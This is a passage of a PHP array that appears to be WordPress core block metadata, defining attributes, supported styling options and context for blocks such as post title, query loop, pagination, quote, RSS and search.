          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'post-comments-form' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-comments-form',
    'title' => 'Comments Form',
    'category' => 'theme',
    'description' => 'Display a post\'s comments form.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'postId',
      'postType'
    ),
    'supports' => array(
      'html' => false,
      'color' => array(
        'gradients' => true,
        'heading' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextTransform' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      )
    ),
    'editorStyle' => 'wp-block-post-comments-form-editor',
    'style' => array(
      'wp-block-post-comments-form',
      'wp-block-buttons',
      'wp-block-button'
    )
  ),
  'post-content' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-content',
    'title' => 'Content',
    'category' => 'theme',
    'description' => 'Displays the contents of a post or page.',
    'textdomain' => 'default',
    'usesContext' => array(
      'postId',
      'postType',
      'queryId'
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'layout' => true,
      'dimensions' => array(
        'minHeight' => true
      ),
      'spacing' => array(
        'blockGap' => true
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => false,
          'text' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      )
    ),
    'editorStyle' => 'wp-block-post-content-editor'
  ),
  'post-date' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-date',
    'title' => 'Date',
    'category' => 'theme',
    'description' => 'Display the publish date for an entry such as a post or page.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'format' => array(
        'type' => 'string'
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'displayType' => array(
        'type' => 'string',
        'default' => 'date'
      )
    ),
    'usesContext' => array(
      'postId',
      'postType',
      'queryId'
    ),
    'supports' => array(
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'post-excerpt' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-excerpt',
    'title' => 'Excerpt',
    'category' => 'theme',
    'description' => 'Display the excerpt.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'moreText' => array(
        'type' => 'string'
      ),
      'showMoreOnNewLine' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'excerptLength' => array(
        'type' => 'number',
        'default' => 55
      )
    ),
    'usesContext' => array(
      'postId',
      'postType',
      'queryId'
    ),
    'supports' => array(
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-post-excerpt-editor',
    'style' => 'wp-block-post-excerpt'
  ),
  'post-featured-image' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-featured-image',
    'title' => 'Featured Image',
    'category' => 'theme',
    'description' => 'Display a post\'s featured image.',
    'textdomain' => 'default',
    'attributes' => array(
      'isLink' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'aspectRatio' => array(
        'type' => 'string'
      ),
      'width' => array(
        'type' => 'string'
      ),
      'height' => array(
        'type' => 'string'
      ),
      'scale' => array(
        'type' => 'string',
        'default' => 'cover'
      ),
      'sizeSlug' => array(
        'type' => 'string'
      ),
      'rel' => array(
        'type' => 'string',
        'attribute' => 'rel',
        'default' => ''
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      ),
      'overlayColor' => array(
        'type' => 'string'
      ),
      'customOverlayColor' => array(
        'type' => 'string'
      ),
      'dimRatio' => array(
        'type' => 'number',
        'default' => 0
      ),
      'gradient' => array(
        'type' => 'string'
      ),
      'customGradient' => array(
        'type' => 'string'
      ),
      'useFirstImageFromPost' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'usesContext' => array(
      'postId',
      'postType',
      'queryId'
    ),
    'supports' => array(
      'align' => array(
        'left',
        'right',
        'center',
        'wide',
        'full'
      ),
      'color' => array(
        'text' => false,
        'background' => false
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'width' => true,
        '__experimentalSkipSerialization' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'width' => true
        )
      ),
      'filter' => array(
        'duotone' => true
      ),
      'shadow' => array(
        '__experimentalSkipSerialization' => true
      ),
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'selectors' => array(
      'border' => '.wp-block-post-featured-image img, .wp-block-post-featured-image .block-editor-media-placeholder, .wp-block-post-featured-image .wp-block-post-featured-image__overlay',
      'shadow' => '.wp-block-post-featured-image img, .wp-block-post-featured-image .components-placeholder',
      'filter' => array(
        'duotone' => '.wp-block-post-featured-image img, .wp-block-post-featured-image .wp-block-post-featured-image__placeholder, .wp-block-post-featured-image .components-placeholder__illustration, .wp-block-post-featured-image .components-placeholder::before'
      )
    ),
    'editorStyle' => 'wp-block-post-featured-image-editor',
    'style' => 'wp-block-post-featured-image'
  ),
  'post-navigation-link' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-navigation-link',
    'title' => 'Post Navigation Link',
    'category' => 'theme',
    'description' => 'Displays the next or previous post link that is adjacent to the current post.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'type' => array(
        'type' => 'string',
        'default' => 'next'
      ),
      'label' => array(
        'type' => 'string'
      ),
      'showTitle' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'linkLabel' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'arrow' => array(
        'type' => 'string',
        'default' => 'none'
      ),
      'taxonomy' => array(
        'type' => 'string',
        'default' => ''
      )
    ),
    'usesContext' => array(
      'postType'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'color' => array(
        'link' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalWritingMode' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-post-navigation-link'
  ),
  'post-template' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-template',
    'title' => 'Post Template',
    'category' => 'theme',
    'parent' => array(
      'core/query'
    ),
    'description' => 'Contains the block elements used to render a post, like the title, date, featured image, content or excerpt, and more.',
    'textdomain' => 'default',
    'usesContext' => array(
      'queryId',
      'query',
      'displayLayout',
      'templateSlug',
      'previewPostType',
      'enhancedPagination'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'align' => array(
        'wide',
        'full'
      ),
      'layout' => true,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'spacing' => array(
        'blockGap' => array(
          '__experimentalDefault' => '1.25em'
        ),
        '__experimentalDefaultControls' => array(
          'blockGap' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-post-template',
    'editorStyle' => 'wp-block-post-template-editor'
  ),
  'post-terms' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-terms',
    'title' => 'Post Terms',
    'category' => 'theme',
    'description' => 'Post terms.',
    'textdomain' => 'default',
    'attributes' => array(
      'term' => array(
        'type' => 'string'
      ),
      'textAlign' => array(
        'type' => 'string'
      ),
      'separator' => array(
        'type' => 'string',
        'default' => ', '
      ),
      'prefix' => array(
        'type' => 'string',
        'default' => ''
      ),
      'suffix' => array(
        'type' => 'string',
        'default' => ''
      )
    ),
    'usesContext' => array(
      'postId',
      'postType'
    ),
    'supports' => array(
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-post-terms'
  ),
  'post-title' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-title',
    'title' => 'Title',
    'category' => 'theme',
    'description' => 'Displays the title of a post, page, or any other content-type.',
    'textdomain' => 'default',
    'usesContext' => array(
      'postId',
      'postType',
      'queryId'
    ),
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'level' => array(
        'type' => 'number',
        'default' => 2
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'rel' => array(
        'type' => 'string',
        'attribute' => 'rel',
        'default' => ''
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      )
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-post-title'
  ),
  'preformatted' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/preformatted',
    'title' => 'Preformatted',
    'category' => 'text',
    'description' => 'Add text that respects your spacing and tabs, and also allows styling.',
    'textdomain' => 'default',
    'attributes' => array(
      'content' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'pre',
        '__unstablePreserveWhiteSpace' => true,
        '__experimentalRole' => 'content'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'color' => array(
        'gradients' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'padding' => true,
        'margin' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-preformatted'
  ),
  'pullquote' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/pullquote',
    'title' => 'Pullquote',
    'category' => 'text',
    'description' => 'Give special visual emphasis to a quote from your text.',
    'textdomain' => 'default',
    'attributes' => array(
      'value' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'p',
        '__experimentalRole' => 'content'
      ),
      'citation' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'cite',
        '__experimentalRole' => 'content'
      ),
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'align' => array(
        'left',
        'right',
        'wide',
        'full'
      ),
      'color' => array(
        'gradients' => true,
        'background' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'style' => true,
        'width' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'style' => true,
          'width' => true
        )
      ),
      '__experimentalStyle' => array(
        'typography' => array(
          'fontSize' => '1.5em',
          'lineHeight' => '1.6'
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-pullquote-editor',
    'style' => 'wp-block-pullquote'
  ),
  'query' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/query',
    'title' => 'Query Loop',
    'category' => 'theme',
    'description' => 'An advanced block that allows displaying post types based on different query parameters and visual configurations.',
    'textdomain' => 'default',
    'attributes' => array(
      'queryId' => array(
        'type' => 'number'
      ),
      'query' => array(
        'type' => 'object',
        'default' => array(
          'perPage' => null,
          'pages' => 0,
          'offset' => 0,
          'postType' => 'post',
          'order' => 'desc',
          'orderBy' => 'date',
          'author' => '',
          'search' => '',
          'exclude' => array(
            
          ),
          'sticky' => '',
          'inherit' => true,
          'taxQuery' => null,
          'parents' => array(
            
          )
        )
      ),
      'tagName' => array(
        'type' => 'string',
        'default' => 'div'
      ),
      'namespace' => array(
        'type' => 'string'
      ),
      'enhancedPagination' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'providesContext' => array(
      'queryId' => 'queryId',
      'query' => 'query',
      'displayLayout' => 'displayLayout',
      'enhancedPagination' => 'enhancedPagination'
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'layout' => true,
      'interactivity' => true
    ),
    'editorStyle' => 'wp-block-query-editor'
  ),
  'query-no-results' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/query-no-results',
    'title' => 'No results',
    'category' => 'theme',
    'description' => 'Contains the block elements used to render content when no query results are found.',
    'parent' => array(
      'core/query'
    ),
    'textdomain' => 'default',
    'usesContext' => array(
      'queryId',
      'query'
    ),
    'supports' => array(
      'align' => true,
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'query-pagination' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/query-pagination',
    'title' => 'Pagination',
    'category' => 'theme',
    'ancestor' => array(
      'core/query'
    ),
    'allowedBlocks' => array(
      'core/query-pagination-previous',
      'core/query-pagination-numbers',
      'core/query-pagination-next'
    ),
    'description' => 'Displays a paginated navigation to next/previous set of posts, when applicable.',
    'textdomain' => 'default',
    'attributes' => array(
      'paginationArrow' => array(
        'type' => 'string',
        'default' => 'none'
      ),
      'showLabel' => array(
        'type' => 'boolean',
        'default' => true
      )
    ),
    'usesContext' => array(
      'queryId',
      'query'
    ),
    'providesContext' => array(
      'paginationArrow' => 'paginationArrow',
      'showLabel' => 'showLabel'
    ),
    'supports' => array(
      'align' => true,
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'layout' => array(
        'allowSwitching' => false,
        'allowInheriting' => false,
        'default' => array(
          'type' => 'flex'
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-query-pagination-editor',
    'style' => 'wp-block-query-pagination'
  ),
  'query-pagination-next' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/query-pagination-next',
    'title' => 'Next Page',
    'category' => 'theme',
    'parent' => array(
      'core/query-pagination'
    ),
    'description' => 'Displays the next posts page link.',
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'queryId',
      'query',
      'paginationArrow',
      'showLabel',
      'enhancedPagination'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'query-pagination-numbers' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/query-pagination-numbers',
    'title' => 'Page Numbers',
    'category' => 'theme',
    'parent' => array(
      'core/query-pagination'
    ),
    'description' => 'Displays a list of page numbers for pagination.',
    'textdomain' => 'default',
    'attributes' => array(
      'midSize' => array(
        'type' => 'number',
        'default' => 2
      )
    ),
    'usesContext' => array(
      'queryId',
      'query',
      'enhancedPagination'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-query-pagination-numbers-editor'
  ),
  'query-pagination-previous' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/query-pagination-previous',
    'title' => 'Previous Page',
    'category' => 'theme',
    'parent' => array(
      'core/query-pagination'
    ),
    'description' => 'Displays the previous posts page link.',
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'queryId',
      'query',
      'paginationArrow',
      'showLabel',
      'enhancedPagination'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'query-title' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/query-title',
    'title' => 'Query Title',
    'category' => 'theme',
    'description' => 'Display the query title.',
    'textdomain' => 'default',
    'attributes' => array(
      'type' => array(
        'type' => 'string'
      ),
      'textAlign' => array(
        'type' => 'string'
      ),
      'level' => array(
        'type' => 'number',
        'default' => 1
      ),
      'showPrefix' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'showSearchTerm' => array(
        'type' => 'boolean',
        'default' => true
      )
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'gradients' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-query-title'
  ),
  'quote' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/quote',
    'title' => 'Quote',
    'category' => 'text',
    'description' => 'Give quoted text visual emphasis. "In quoting others, we cite ourselves." — Julio Cortázar',
    'keywords' => array(
      'blockquote',
      'cite'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'value' => array(
        'type' => 'string',
        'source' => 'html',
        'selector' => 'blockquote',
        'multiline' => 'p',
        'default' => '',
        '__experimentalRole' => 'content'
      ),
      'citation' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'cite',
        '__experimentalRole' => 'content'
      ),
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'html' => false,
      '__experimentalOnEnter' => true,
      '__experimentalOnMerge' => true,
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'color' => array(
        'gradients' => true,
        'heading' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'layout' => array(
        'allowEditing' => false
      ),
      'spacing' => array(
        'blockGap' => true
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'styles' => array(
      array(
        'name' => 'default',
        'label' => 'Default',
        'isDefault' => true
      ),
      array(
        'name' => 'plain',
        'label' => 'Plain'
      )
    ),
    'editorStyle' => 'wp-block-quote-editor',
    'style' => 'wp-block-quote'
  ),
  'read-more' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/read-more',
    'title' => 'Read More',
    'category' => 'theme',
    'description' => 'Displays the link of a post, page, or any other content-type.',
    'textdomain' => 'default',
    'attributes' => array(
      'content' => array(
        'type' => 'string'
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      )
    ),
    'usesContext' => array(
      'postId'
    ),
    'supports' => array(
      'html' => false,
      'color' => array(
        'gradients' => true,
        'text' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true,
          'textDecoration' => true
        )
      ),
      'spacing' => array(
        'margin' => array(
          'top',
          'bottom'
        ),
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'padding' => true
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'width' => true,
        '__experimentalDefaultControls' => array(
          'width' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-read-more'
  ),
  'rss' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/rss',
    'title' => 'RSS',
    'category' => 'widgets',
    'description' => 'Display entries from any RSS or Atom feed.',
    'keywords' => array(
      'atom',
      'feed'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'columns' => array(
        'type' => 'number',
        'default' => 2
      ),
      'blockLayout' => array(
        'type' => 'string',
        'default' => 'list'
      ),
      'feedURL' => array(
        'type' => 'string',
        'default' => ''
      ),
      'itemsToShow' => array(
        'type' => 'number',
        'default' => 5
      ),
      'displayExcerpt' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'displayAuthor' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'displayDate' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'excerptLength' => array(
        'type' => 'number',
        'default' => 55
      )
    ),
    'supports' => array(
      'align' => true,
      'html' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-rss-editor',
    'style' => 'wp-block-rss'
  ),
  'search' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/search',
    'title' => 'Search',
    'category' => 'widgets',
    'description' => 'Help visitors find your content.',
    'keywords' => array(
      'find'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string',
        '__experimentalRole' => 'content'
      ),
      'showLabel' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'placeholder' => array(
        'type' => 'string',
        'default' => '',
        '__experimentalRole' => 'content'
      ),
      'width' => array(
        'type' => 'number'
      ),
      'widthUnit' => array(
        'type' => 'string'
      ),
      'buttonText' => array(
        'type' => 'string',
        '__experimentalRole' => 'content'
      ),
      'buttonPosition' => array(
        'type' => 'string',
        'default' => 'button-outside'
      ),
      'buttonUseIcon' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'query' => array(
        'type' => 'object',
        'default' => array(
          
        )
      ),
      'isSearchFieldHidden' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'supports' => array(
      'align' => array(
        'left',
        'center',
        'right'
      ),
      'color' => array(
        'gradients' => true,
        '__experimentalSkipSerialization' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'interactivity' => true,
      'typography' => array(
        '__experimentalSkipSerialization' => true,
        '__experimentalSelector' => '.wp-block-search__label, .wp-block-search__input, .wp-block-search__button',
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'width' => true,
        '__experimentalSkipSerialization' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'width' => true
        )
      ),
      'html' => false
    ),
    'editorStyle' => 'wp-block-search-editor',
    'style' => 'wp-block-search'
  ),
